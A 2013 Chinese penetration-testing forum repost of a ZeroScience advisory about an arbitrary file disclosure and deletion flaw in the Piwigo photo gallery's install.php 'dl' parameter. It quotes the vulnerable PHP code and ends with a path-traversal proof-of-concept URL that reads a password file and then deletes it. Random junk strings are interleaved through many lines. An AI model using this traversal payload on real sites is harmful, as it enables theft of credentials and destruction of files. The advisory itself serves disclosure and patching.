中国网络渗透测试联盟

标题: Piwigo任意文件泄露和任意文件删除漏洞 [打印本页]

---

作者: admin    时间: 2013-3-14 20:15
标题: Piwigo任意文件泄露和任意文件删除漏洞
Piwigo是用PHP编写的相册脚本。
+ v6 e8 o7 W( u. z
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
1 _+ q5 t8 k/ O5 S6 h: Z6 p====================================================================
/install.php:
2 _2 ~9 U8 Y+ `-------------
5 J8 T0 n* D  l* d/ I: ^113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
& \' L" K  y3 Y7 H115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
* V7 j$ _7 e0 j0 G117:   header('Pragma: no-cache');
5 W0 A  E8 ~# Y5 d118:   header('Content-Disposition: attachment; filename="database.inc.php"');
9 o* F4 R: K% F: G) J) [& o119:   header('Content-Transfer-Encoding: binary');
0 ~# B! k9 C( S" K2 f; r120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
122:   unlink($filename);
123:   exit();
124: }
====================================================================
: J. x/ g* U  p" l. u  M
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
" [- y0 V- H3 n8 I2 s/ }  S           Apache 2.4.2 (Win32)
! f: t  R& o* A3 o6 t           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
& j. V: k* _1 E8 }/ y                            @zeroscience
0 m9 G- b; d3 x
Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
; y. ^$ V/ p  L* yVendor Patch: http://piwigo.org/bugs/view.php?id=2843
  m5 S! X* V  S, Y& W
: l3 U5 M9 q6 E1 p15.02.2013
( ^  t1 e) J: U+ X4 _
) b2 J" a' J) Z7 u6 }--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
5 V6 R  I; l/ m2 k1 ~( W1 T) j0 |
1 x7 q0 K9 T% d/ Q; s2 n  @: n

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2